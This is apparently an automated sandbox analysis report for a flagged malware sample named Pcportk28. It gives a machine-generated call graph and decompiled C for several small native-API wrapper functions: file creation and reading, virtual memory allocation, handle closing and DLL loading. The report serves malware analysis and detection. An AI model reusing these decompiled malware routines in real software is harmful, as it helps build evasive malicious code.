61780->61781 61782 413b44 61781->61782 61782->61720 61782->61721 61782->61724 61784 4185fc NtCreateFile 61783->61784 61785 4191e0 LdrLoadDll 61783->61785 61784->61725 61785->61784 61787 41370c 61786->61787 61788 418560 LdrLoadDll 61787->61788 61789 41372d 61788->61789 61790 413734 61789->61790 61791 413748 61789->61791 61793 418710 2 API calls 61790->61793 61792 418710 2 API calls 61791->61792 61794 413751 61792->61794 61795 41373d 61793->61795 61850 41a2b0 LdrLoadDll RtlAllocateHeap 61794->61850 61795->61749 61797 41375c 61797->61749 61799 41345b 61798->61799 61800 41348e 61798->61800 61801 418560 LdrLoadDll 61799->61801 61802 4135d9 61800->61802 61806 4134aa 61800->61806 61804 413476 61801->61804 61803 418560 LdrLoadDll 61802->61803 61810 4135f4 61803->61810 61805 418710 2 API calls 61804->61805 61807 41347f 61805->61807 61808 418560 LdrLoadDll 61806->61808 61807->61752 61809 4134c5 61808->61809 61812 4134e1 61809->61812 61813 4134cc 61809->61813 61863 4185a0 LdrLoadDll 61810->61863 61814 4134e6 61812->61814 61815 4134fc 61812->61815 61817 418710 2 API calls 61813->61817 61818 418710 2 API calls 61814->61818 61826 413501 61815->61826 61851 41a270 61815->61851 61816 41362e 61819 418710 2 API calls 61816->61819 61820 4134d5 61817->61820 61821 4134ef 61818->61821 61823 413639 61819->61823 61820->61752 61821->61752 61822 413513 61822->61752 61823->61752 61826->61822 61854 418690 61826->61854 61827 413567 61831 41357e 61827->61831 61862 418520 LdrLoadDll 61827->61862 61829 413585 61832 418710 2 API calls 61829->61832 61830 41359a 61833 418710 2 API calls 61830->61833 61831->61829 61831->61830 61832->61822 61834 4135a3 61833->61834 61835 4135cf 61834->61835 61857 419e70 61834->61857 61835->61752 61837 4135ba 61838 41a0a0 2 API calls 61837->61838 61839 4135c3 61838->61839 61839->61752 61840->61724 61841->61745 61843 4191e0 LdrLoadDll 61842->61843 61844 413d14 61842->61844 61843->61844 61845 4185a0 LdrLoadDll 61844->61845 61845->61748 61847 41872c NtClose 61846->61847 61848 4191e0 LdrLoadDll 61846->61848 61847->61753 61848->61847 61849->61733 61850->61797 61864 4188b0 61851->61864 61853 41a288 61853->61826 61855 4191e0 LdrLoadDll 61854->61855 61856 4186ac NtReadFile 61855->61856 61856->61827 61858 419e94 61857->61858 61859 419e7d 61857->61859 61858->61837 61859->61858 61860 41a270 2 API calls 61859->61860 61861 419eab 61860->61861 61861->61837 61862->61831 61863->61816 61865 4191e0 LdrLoadDll 61864->61865 61866 4188cc RtlAllocateHeap 61865->61866 61866->61853 61868 41a04d 61867->61868 61997 4187c0 61867->61997 61868->61758 61871 413071 61870->61871 61872 413079 61870->61872 61871->61761 61901 41334c 61872->61901 62000 41b250 61872->62000 61874 4130cd 61875 41b250 2 API calls 61874->61875 61880 4130d8 61875->61880 61876 413126 61878 41b250 2 API calls 61876->61878 61882 41313a 61878->61882 61879 41b380 3 API calls 61879->61880 61880->61876 61880->61879 62011 41b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 61880->62011 61881 413197 61883 41b250 2 API calls 61881->61883 61882->61881 62005 41b380 61882->62005 61884 4131ad 61883->61884 61886 4131ea 61884->61886 61888 41b380 3 API calls 61884->61888 61887 41b250 2 API calls 61886->61887 61889 4131f5 61887->61889 61888->61884 61890 41b380 3 API calls 61889->61890 61896 41322f 61889->61896 61890->61889 61892 413324 62013 41b2b0 LdrLoadDll RtlFreeHeap 61892->62013 61894 41332e 62014 41b2b0 LdrLoadDll RtlFreeHeap 61894->62014 62012 41b2b0 LdrLoadDll RtlFreeHeap 61896->62012 61897 413338 62015 41b2b0 LdrLoadDll RtlFreeHeap 61897->62015 61899 413342 62016 41b2b0 LdrLoadDll RtlFreeHeap 61899->62016 61901->61761 61903 4143a1 61902->61903 61904 413a50 8 API calls 61903->61904 61906 4143b7 61904->61906 61905 41440a 61905->61764 61906->61905 61907 4143f2 61906->61907 61908 414405 61906->61908 61909 41a0a0 2 API calls 61907->61909 61910 41a0a0 2 API calls 61908->61910 61911 4143f7 61909->61911 61910->61905 61911->61764 62017 418eb0 61912->62017 61915 418eb0 LdrLoadDll 61916 41900d 61915->61916 61917 418eb0 LdrLoadDll 61916->61917 61918 419016 61917->61918 61919 418eb0 LdrLoadDll 61918->61919 61920 41901f 61919->61920 61921 418eb0 LdrLoadDll 61920->61921 61922 419028 61921->61922 61923 418eb0 LdrLoadDll 61922->61923 61924 419031 61923->61924 61925 418eb0 LdrLoadDll 61924->61925 61926 41903d 61925->61926 61927 418eb0 LdrLoadDll 61926->61927 61928 419046 61927->61928 61929 418eb0 LdrLoadDll 61928->61929 61930 41904f 61929->61930 61931 418eb0 LdrLoadDll 61930->61931 61932 419058 61931->61932 61933 418eb0 LdrLoadDll 61932->61933 61934 419061 61933->61934 61935 418eb0 LdrLoadDll 61934->61935 61936 41906a 61935->61936 61937 418eb0 LdrLoadDll 61936->61937 61938 419076 61937->61938 61939 418eb0 LdrLoadDll 61938->61939 61940 41907f 61939->61940 61941 418eb0 LdrLoadDll 61940->61941 61942 419088 61941->61942 61943 418eb0 LdrLoadDll 61942->61943 61944 419091 61943->61944 61945 418eb0 LdrLoadDll 61944->61945 61946 41909a 61945->61946 61947 418eb0 LdrLoadDll 61946->61947 61948 4190a3 61947->61948 61949 418eb0 LdrLoadDll 61948->61949 61950 4190af 61949->61950 61951 418eb0 LdrLoadDll 61950->61951 61952 4190b8 61951->61952 61953 418eb0 LdrLoadDll 61952->61953 61954 4190c1 61953->61954 61955 418eb0 LdrLoadDll 61954->61955 61956 4190ca 61955->61956 61957 418eb0 LdrLoadDll 61956->61957 61958 4190d3 61957->61958 61959 418eb0 LdrLoadDll 61958->61959 61960 4190dc 61959->61960 61961 418eb0 LdrLoadDll 61960->61961 61962 4190e8 61961->61962 61963 418eb0 LdrLoadDll 61962->61963 61964 4190f1 61963->61964 61965 418eb0 LdrLoadDll 61964->61965 61966 4190fa 61965->61966 61967 418eb0 LdrLoadDll 61966->61967 61968 419103 61967->61968 61969 418eb0 LdrLoadDll 61968->61969 61970 41910c 61969->61970 61971 418eb0 LdrLoadDll 61970->61971 61972 419115 61971->61972 61973 418eb0 LdrLoadDll 61972->61973 61974 419121 61973->61974 61975 418eb0 LdrLoadDll 61974->61975 61976 41912a 61975->61976 61977 418eb0 LdrLoadDll 61976->61977 61978 419133 61977->61978 61979 418eb0 LdrLoadDll 61978->61979 61980 41913c 61979->61980 61981 418eb0 LdrLoadDll 61980->61981 61982 419145 61981->61982 61983 418eb0 LdrLoadDll 61982->61983 61984 41914e 61983->61984 61985 418eb0 LdrLoadDll 61984->61985 61986 41915a 61985->61986 61987 418eb0 LdrLoadDll 61986->61987 61988 419163 61987->61988 61989 418eb0 LdrLoadDll 61988->61989 61990 41916c 61989->61990 61990->61769 61992 4191e0 LdrLoadDll 61991->61992 61993 41815c 61992->61993 62023 84fdc0 LdrInitializeThunk 61993->62023 61994 418173 61994->61689 61996->61766 61998 4191e0 LdrLoadDll 61997->61998 61999 4187dc NtAllocateVirtualMemory 61998->61999 61999->61868 62001 41b260 62000->62001 62002 41b266 62000->62002 62001->61874 62003 41a270 2 API calls 62002->62003 62004 41b28c 62003->62004 62004->61874 62006 41b2f0 62005->62006 62007 41a270 2 API calls 62006->62007 62009 41b34d 62006->62009 62008 41b32a 62007->62008 62010 41a0a0 2 API calls 62008->62010 62009->61882 62010->62009 62011->61880 62012->61892 62013->61894 62014->61897 62015->61899 62016->61901 62018 418ecb 62017->62018 62019 413e50 LdrLoadDll 62018->62019 62020 418eeb 62019->62020 62021 413e50 LdrLoadDll 62020->62021 62022 418f97 62020->62022 62021->62022 62022->61915 62023->61994 62024->61775 62026 4191e0 LdrLoadDll 62025->62026 62027 41890c RtlFreeHeap 62026->62027 62027->61778 62029 406e30 62028->62029 62030 406e2b 62028->62030 62031 41a020 2 API calls 62029->62031 62030->61696 62037 406e55 62031->62037 62032 406eb8 62032->61696 62033 418140 2 API calls 62033->62037 62034 406ebe 62036 406ee4 62034->62036 62038 418840 2 API calls 62034->62038 62036->61696 62037->62032 62037->62033 62037->62034 62039 41a020 2 API calls 62037->62039 62044 418840 62037->62044 62040 406ed5 62038->62040 62039->62037 62040->61696 62042 4070fe 62041->62042 62043 418840 2 API calls 62041->62043 62042->61658 62043->62042 62045 4191e0 LdrLoadDll 62044->62045 62046 41885c 62045->62046 62049 84fb68 LdrInitializeThunk 62046->62049 62047 418873 62047->62037 62049->62047 62051 419843 62050->62051 62054 409b40 62051->62054 62055 409b64 62054->62055 62056 409ba0 LdrLoadDll 62055->62056 62057 408a7b 62055->62057 62056->62057 62057->61666 62059 409eb3 62058->62059 62061 409f30 62059->62061 62074 417f10 LdrLoadDll 62059->62074 62061->61671 62063 4191e0 LdrLoadDll 62062->62063 62064 40cfab 62063->62064 62064->61679 62065 418a50 62064->62065 62066 418a56 62065->62066 62067 4191e0 LdrLoadDll 62066->62067 62068 418a6f LookupPrivilegeValueW 62067->62068 62068->61675 62070 4184fc 62069->62070 62071 4191e0 LdrLoadDll 62069->62071 62075 84fed0 LdrInitializeThunk 62070->62075 62071->62070 62072 41851b 62072->61676 62074->62061 62075->62072 62077 40a037 62076->62077 62078 409e90 LdrLoadDll 62077->62078 62079 40a066 62078->62079 62079->61601 62081 40d09a 62080->62081 62089 40d150 62080->62089 62082 409e90 LdrLoadDll 62081->62082 62083 40d0bc 62082->62083 62090 4181c0 62083->62090 62085 40d0fe 62093 418200 62085->62093 62088 418710 2 API calls 62088->62089 62089->61604 62089->61605 62091 4191e0 LdrLoadDll 62090->62091 62092 4181dc 62091->62092 62092->62085 62094 41821c 62093->62094 62095 4191e0 LdrLoadDll 62093->62095 62098 8507ac LdrInitializeThunk 62094->62098 62095->62094 62096 40d144 62096->62088 62098->62096 62100 409c9d 62099->62100 62101 409ca1 62099->62101 62100->61615 62102 409cba 62101->62102 62103 409cec 62101->62103 62145 417f50 LdrLoadDll 62102->62145 62146 417f50 LdrLoadDll 62103->62146 62105 409cfd 62105->61615 62107 409cdc 62107->61615 62109 40d200 3 API calls 62108->62109 62110 4133c6 62109->62110 62110->61617 62112 4079e9 62111->62112 62147 407710 62111->62147 62114 407a0d 62112->62114 62115 407710 19 API calls 62112->62115 62114->61619 62116 4079fa 62115->62116 62116->62114 62165 40d470 10 API calls 62116->62165 62119 4191e0 LdrLoadDll 62118->62119 62120 41879c 62119->62120 62284 84fea0 LdrInitializeThunk 62120->62284 62121 40a772 62123 40d200 62121->62123 62124 40d21d 62123->62124 62285 418240 62124->62285 62127 40d265 62127->61623 62128 418290 2 API calls 62129 40d28e 62128->62129 62129->61623 62131 4182ac 62130->62131 62132 4191e0 LdrLoadDll 62130->62132 62291 84fc60 LdrInitializeThunk 62131->62291 62132->62131 62133 40a7d5 62133->61629 62133->61632 62136 4191e0 LdrLoadDll 62135->62136 62137 4182fc 62136->62137 62292 84fc90 LdrInitializeThunk 62137->62292 62138 40a8a9 62138->61640 62141 4191e0 LdrLoadDll 62140->62141 62142 4180bc 62141->62142 62293 850078 LdrInitializeThunk 62142->62293 62143 40a8fc 62143->61644 62145->62107 62146->62105 62148 406e20 4 API calls 62147->62148 62153 40772a 62147->62153 62148->62153 62149 4079b9 62149->62112 62150 4079af 62151 4070e0 2 API calls 62150->62151 62151->62149 62153->62149 62153->62150 62155 418180 2 API calls 62153->62155 62157 418710 LdrLoadDll NtClose 62153->62157 62160 40a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 62153->62160 62163 4180a0 2 API calls 62153->62163 62166 417f90 62153->62166 62169 407540 62153->62169 62181 40d350 LdrLoadDll NtClose 62153->62181 62182 418010 LdrLoadDll 62153->62182 62183 418040 LdrLoadDll 62153->62183 62184 4180d0 LdrLoadDll 62153->62184 62185 407310 62153->62185 62201 405ea0 LdrLoadDll 62153->62201 62155->62153 62157->62153 62160->62153 62163->62153 62165->62114 62167 417fac 62166->62167 62168 4191e0 LdrLoadDll 62166->62168 62167->62153 62168->62167 62170 407556 62169->62170 62202 417b00 62170->62202 62172 4076e1 62172->62153 62173 40756f 62173->62172 62223 407120 62173->62223 62175 407655 62175->62172 62176 407310 11 API calls 62175->62176 62177 407683 62176->62177 62177->62172 62178 418180 2 API calls 62177->62178 62179 4076b8 62178->62179 62179->62172 62180 418780 2 API calls 62179->62180 62180->62172 62181->62153 62182->62153 62183->62153 62184->62153 62186 407339 62185->62186 62263 407280 62186->62263 62189 418780 2 API calls 62190 40734c 62189->62190 62190->62189 62191 4073d7 62190->62191 62194 4073d2 62190->62194 62271 40d3d0 62190->62271 62191->62153 62192 418710 2 API calls 62193 40740a 62192->62193 62193->62191 62195 417f90 LdrLoadDll 62193->62195 62194->62192 62196 40746f 62195->62196 62196->62191 62275 417fd0 62196->62275 62198 4074d3 62198->62191 62199 413a50 8 API calls 62198->62199 62200 407528 62199->62200 62200->62153 62201->62153 62203 41a270 2 API calls 62202->62203 62204 417b17 62203->62204 62230 408160 62204->62230 62206 417b32 62207 417b70 62206->62207 62208 417b59 62206->62208 62211 41a020 2 API calls 62207->62211 62209 41a0a0 2 API calls 62208->62209 62210 417b66 62209->62210 62210->62173 62212 417baa 62211->62212 62213 41a020 2 API calls 62212->62213 62214 417bc3 62213->62214 62220 417e64 62214->62220 62236 41a060 62214->62236 62217 417e50 62218 41a0a0 2 API calls 62217->62218 62219 417e5a 62218->62219 62219->62173 62221 41a0a0 2 API calls 62220->62221 62222 417eb9 62221->62222 62222->62173 62224 40721f 62223->62224 62225 407135 62223->62225 62224->62175 62225->62224 62226 413a50 8 API calls 62225->62226 62228 4071a2 62226->62228 62227 4071c9 62227->62175 62228->62227 62229 41a0a0 2 API calls 62228->62229 62229->62227 62231 408185 62230->62231 62232 409b40 LdrLoadDll 62231->62232 62233 4081b8 62232->62233 62235 4081dd 62233->62235 62239 40b340 62233->62239 62235->62206 62257 418800 62236->62257 62240 40b36c 62239->62240 62241 418460 LdrLoadDll 62240->62241 62242 40b385 62241->62242 62243 40b38c 62242->62243 62250 4184a0 62242->62250 62243->62235 62247 40b3c7 62248 418710 2 API calls 62247->62248 62249 40b3ea 62248->62249 62249->62235 62251 4184bc 62250->62251 62252 4191e0 LdrLoadDll 62250->62252 62256 84fbb8 LdrInitializeThunk 62251->62256 62252->62251 62253 40b3af 62253->62243 62255 418a90 LdrLoadDll 62253->62255 62255->62247 62256->62253 62258 4191e0 LdrLoadDll 62257->62258 62259 41881c 62258->62259 62262 850048 LdrInitializeThunk 62259->62262 62260 417e49 62260->62217 62260->62220 62262->62260 62264 407298 62263->62264 62265 4072b3 62264->62265 62266 409b40 LdrLoadDll 62264->62266 62267 413e50 LdrLoadDll 62265->62267 62266->62265 62268 4072c3 62267->62268 62269 4072cc PostThreadMessageW 62268->62269 62270 4072db 62268->62270 62269->62270 62270->62190 62272 40d3e3 62271->62272 62278 418110 62272->62278 62276 4191e0 LdrLoadDll 62275->62276 62277 417fec 62276->62277 62277->62198 62279 41812c 62278->62279 62280 4191e0 LdrLoadDll 62278->62280 62283 84fd8c LdrInitializeThunk 62279->62283 62280->62279 62281 40d40e 62281->62190 62283->62281 62284->62121 62286 4191e0 LdrLoadDll 62285->62286 62287 41825c 62286->62287 62290 84ffb4 LdrInitializeThunk 62287->62290 62288 40d25e 62288->62127 62288->62128 62290->62288 62291->62133 62292->62138 62293->62143 62297 84f900 LdrInitializeThunk

                                                Executed Functions

                                                Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 418690-4186d9 call 4191e0 NtReadFile
                                                C-Code - Quality: 37%
                                                			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                0x00418693
                                                0x0041869f
                                                0x004186a7
                                                0x004186ac
                                                0x004186b2
                                                0x004186cd
                                                0x004186d5
                                                0x004186d9

                                                APIs
                                                • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: 1:A$r=A$r=A
                                                • API String ID: 2738559852-4243674446
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 328 409b40-409b69 call 41af70 331 409b6b-409b6e 328->331 332 409b6f-409b7d call 41b390 328->332 335 409b8d-409b9e call 419720 332->335 336 409b7f-409b8a call 41b610 332->336 341 409ba0-409bb4 LdrLoadDll 335->341 342 409bb7-409bba 335->342 336->335 341->342
                                                C-Code - Quality: 100%
                                                			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                0x00409b5c
                                                0x00409b5f
                                                0x00409b64
                                                0x00409b69
                                                0x00409b73
                                                0x00409b78
                                                0x00409b7b
                                                0x00409b7d
                                                0x00409b85
                                                0x00409b8a
                                                0x00409b8a
                                                0x00409b91
                                                0x00409b99
                                                0x00409b9c
                                                0x00409b9e
                                                0x00409bb2
                                                0x00000000
                                                0x00409bb4
                                                0x00409bba
                                                0x00409b6e
                                                0x00409b6e
                                                0x00409b6e

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 343 4185da-418631 call 4191e0 NtCreateFile
                                                C-Code - Quality: 79%
                                                			E004185DA(void* __ecx, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				void* _t35;

				asm("arpl [0xec8b55ad], ax");
				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E004191E0(_t35, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}





                                                0x004185dd
                                                0x004185e3
                                                0x004185ef
                                                0x004185f7
                                                0x0041862d
                                                0x00418631

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 162cdf515cac6653bfd59ed20980bc09eb686c5a20da41cb830c8ac6be52739c
                                                • Instruction ID: b9f2e3890fc73302027b6f747371c2d241cd4aec790cf57057c1563235709154
                                                • Opcode Fuzzy Hash: 162cdf515cac6653bfd59ed20980bc09eb686c5a20da41cb830c8ac6be52739c
                                                • Instruction Fuzzy Hash: EF01AFB6200109AFDB08DF88DC95EEB77A9BF8C354F158259FA0D97241DA30E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 346 4185e0-4185f6 347 4185fc-418631 NtCreateFile 346->347 348 4185f7 call 4191e0 346->348 348->347
                                                C-Code - Quality: 100%
                                                			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                0x004185ef
                                                0x004185f7
                                                0x0041862d
                                                0x00418631

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 349 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                                C-Code - Quality: 100%
                                                			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                0x004187cf
                                                0x004187d7
                                                0x004187f9
                                                0x004187fd

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                0x00418713
                                                0x00418716
                                                0x0041871f
                                                0x00418727
                                                0x00418735
                                                0x00418739

                                                APIs
                                                • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041870B, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E0041870B(void* __eax, void* __edx, void* __esi, intOrPtr _a4, void* _a8) {
				void* _v1947432107;
				long _t14;
				void* _t19;

				asm("salc");
				_t11 = _a4;
				_t6 = _t11 + 0x10; // 0x300
				_t7 = _t11 + 0xc50; // 0x409763
				E004191E0(_t19, _a4, _t7,  *_t6, 0, 0x2c);
				_t14 = NtClose(_a8); // executed
				return _t14;
			}






                                                0x0041870c
                                                0x00418713
                                                0x00418716
                                                0x0041871f
                                                0x00418727
                                                0x00418735
                                                0x00418739

                                                APIs
                                                • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: e5723cbc30639a60c29b0e4d2bdf3396e620d91b9ef30188d952d97442a17d48
                                                • Instruction ID: d2e932f7c5f20ef975760f6ef5b964e6c25fa2671074bb2052d699baf9ba6776
                                                • Opcode Fuzzy Hash: e5723cbc30639a60c29b0e4d2bdf3396e620d91b9ef30188d952d97442a17d48
                                                • Instruction Fuzzy Hash: 26D0C27950D2814BD715FA74A8D108BBB40DE825287145A8EE4A407143C2649215D791
                                                Uniqueness

